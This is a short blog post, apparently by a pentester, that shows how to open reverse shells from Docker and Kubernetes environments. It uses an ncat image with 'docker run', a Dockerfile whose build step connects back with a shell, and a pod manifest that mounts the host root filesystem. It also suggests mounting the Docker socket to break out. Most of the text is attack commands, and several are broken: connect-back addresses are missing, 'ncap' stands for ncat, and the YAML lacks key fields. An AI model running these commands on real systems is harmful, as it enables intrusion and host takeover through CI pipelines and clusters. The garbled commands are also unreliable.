A handy technique for any pentester is the ability to create a reverse shell. This allows for a variety of cases where you want to get access to restricted environments or want to extract information from a remote system.

There’s a number of scenarios where this can apply to containerized environments, here’s a couple with the steps that could be used to setup a reverse shell using ncat

Reverse shell from docker run

Here we want to push a reverse shell back from a machine that we have docker run access to, this one is pretty simple

Pentester Machine - We just need to start a listener to wait for our shell to come in. The command below will open a shell on port 8989/TCP to wait for a connection

ncat -l -p 8989

Target Machine Here we just need a Docker image that has ncat available. I’ve got one here on Docker hub.

So we just run this image with ncat parameters to connect back to the pentester machine on

docker run raesene/ncat 8989 -e /bin/sh

Reverse Shell from a Dockerfile

So in our next scenario we’ve got the ability to get our Target Machine to do a docker build on a Dockerfile that we control. This is common in places where there are CI/CD processes like Jenkins or Drone, or cloud container building services.

Pentester Machine - Same as last time, we just need to start a listener to wait for our shell to come in. The command below will open a shell on port 8989/TCP to wait for a connection

ncap -l -p 8989

Target Machine

Here we need to construct our Dockerfile to pass into the process, this one should work based on a base ubuntu:18.04 image

FROM ubuntu:18.04

RUN apt update && apt install -y nmap

RUN ncat 8989 -e /bin/sh

CMD ["/bin/bash"]

when the docker build command is executed, the reverse shell will pop during the build process.

Kubernetes Cluster

So say you’ve got a Kubernetes cluster where you can create pods but otherwise your rights are limited, and you’d like to get a shell inside the cluster.

Pentester Machine - Same as last time, we just need to start a listener to wait for our shell to come in. The command below will open a shell on port 8989/TCP to wait for a connection

ncap -l -p 8989

Target Cluster

So we just need a Pod manifest that will open a reverse shell on your pentester machine when created. The example below will create that kind of pod and additionally will mount the hosts root filesystem into /host, although this will fail if a restrictive PodSecurityPolicy is in place.

apiVersion: v1
kind: Pod
  name: ncat-reverse-shell-pod
    app: ncat
  - name: ncat-reverse-shell
    image: raesene/ncat
    - mountPath: /host
      name: hostvolume
    args: ['', '8989', '-e', '/bin/bash']
  - name: hostvolume
      path: /
      type: Directory

For extra credit you could mount in the Docker socket from the underlying host and then break out relatively easily


Security Geek, Kubernetes, Docker, Ruby, Hillwalking